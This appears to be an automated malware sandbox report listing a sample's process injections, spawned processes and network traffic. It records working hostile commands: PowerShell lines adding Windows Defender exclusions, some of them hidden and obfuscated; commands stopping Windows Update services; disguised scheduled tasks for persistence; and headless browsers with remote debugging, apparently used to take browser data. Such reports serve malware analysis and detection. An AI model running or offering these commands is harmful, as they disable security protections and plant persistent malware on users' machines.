PID 1484 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 3816 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3816 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3816 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3816 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3816 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1484 wrote to memory of 376 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 1484 wrote to memory of 376 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 1484 wrote to memory of 376 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 376 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 376 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 1500 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 1500 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3208 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3208 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe

"C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3816 -ip 3816

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 284

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffacb239758,0x7ffacb239768,0x7ffacb239778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=56512 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1320 --field-trial-handle=1468,i,2635314597832475149,12586408098179650270,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1684 --field-trial-handle=1468,i,2635314597832475149,12586408098179650270,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=56512 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1976 --field-trial-handle=1468,i,2635314597832475149,12586408098179650270,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=56512 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1952 --field-trial-handle=1468,i,2635314597832475149,12586408098179650270,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=56512 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2568 --field-trial-handle=1468,i,2635314597832475149,12586408098179650270,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=56512 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3204 --field-trial-handle=1468,i,2635314597832475149,12586408098179650270,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=56512 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3392 --field-trial-handle=1468,i,2635314597832475149,12586408098179650270,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=56512 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=2616 --field-trial-handle=1468,i,2635314597832475149,12586408098179650270,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=3480 --field-trial-handle=1468,i,2635314597832475149,12586408098179650270,131072 --disable-features=PaintHolding /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x308 0x338

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=43317 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG" --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffacd9a46f8,0x7ffacd9a4708,0x7ffacd9a4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1508,10279509759280621852,11055262424386862408,131072 --disable-features=PaintHolding --headless --headless --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=1688 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1508,10279509759280621852,11055262424386862408,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=none --use-gl=swiftshader-webgl --headless --mojo-platform-channel-handle=1704 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=43317 --allow-pre-commit-input --field-trial-handle=1508,10279509759280621852,11055262424386862408,131072 --disable-features=PaintHolding --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2016 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "Start-Process <#xkdrvuagsyzbwgunlsb#> powershell <#xkdrvuagsyzbwgunlsb#> -Verb <#xkdrvuagsyzbwgunlsb#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=43317 --allow-pre-commit-input --field-trial-handle=1508,10279509759280621852,11055262424386862408,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2208 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=43317 --allow-pre-commit-input --field-trial-handle=1508,10279509759280621852,11055262424386862408,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=43317 --allow-pre-commit-input --field-trial-handle=1508,10279509759280621852,11055262424386862408,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3088 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=43317 --allow-pre-commit-input --field-trial-handle=1508,10279509759280621852,11055262424386862408,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3276 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=43317 --allow-pre-commit-input --field-trial-handle=1508,10279509759280621852,11055262424386862408,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3380 /prefetch:1

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1508,10279509759280621852,11055262424386862408,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=audio --use-gl=swiftshader-webgl --headless --mojo-platform-channel-handle=3544 /prefetch:8

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 12:04 /f /tn TaskManagerCheckUpdate_MTA1 /tr "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle hidden Add-MpPreference -ExclusionPath "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe" -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 12:04 /f /tn "AppLaunch" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
NL 136.244.98.226:33587 tcp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
US 8.8.8.8:53 226.98.244.136.in-addr.arpa udp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 240.81.21.72.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
NL 104.123.41.162:80 www.microsoft.com tcp
NL 104.123.41.162:443 www.microsoft.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RU 185.159.129.168:80 tcp
US 8.8.8.8:53 162.41.123.104.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
RU 185.149.146.118:80 tcp
RU 77.91.77.144:80 tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
US 8.8.8.8:53 apis.google.com udp
US 8.8.8.8:53 ogs.google.com udp
DE 172.217.23.206:443 apis.google.com tcp
NL 142.250.179.206:443 ogs.google.com tcp
US 8.8.8.8:53 100.39.251.142.in-addr.arpa udp
US 8.8.8.8:53 126.136.241.8.in-addr.arpa udp
US 8.8.8.8:53 14.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 174.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.251.36.54:443 i.ytimg.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 206.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 54.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 2.214.58.216.in-addr.arpa udp
N/A 127.0.0.1:56512 tcp
N/A 127.0.0.1:56512 tcp
N/A 127.0.0.1:56512 tcp
N/A 127.0.0.1:56512 tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
GB 216.58.208.98:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 98.208.58.216.in-addr.arpa udp
GB 216.58.208.98:443 googleads.g.doubleclick.net udp
NL 142.251.36.54:443 i.ytimg.com udp
US 8.8.8.8:53 yt3.ggpht.com udp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 static.doubleclick.net udp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
NL 142.251.36.6:443 static.doubleclick.net tcp
NL 142.250.179.138:443 jnn-pa.googleapis.com tcp
NL 142.250.179.138:443 jnn-pa.googleapis.com udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 6.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 138.179.250.142.in-addr.arpa udp
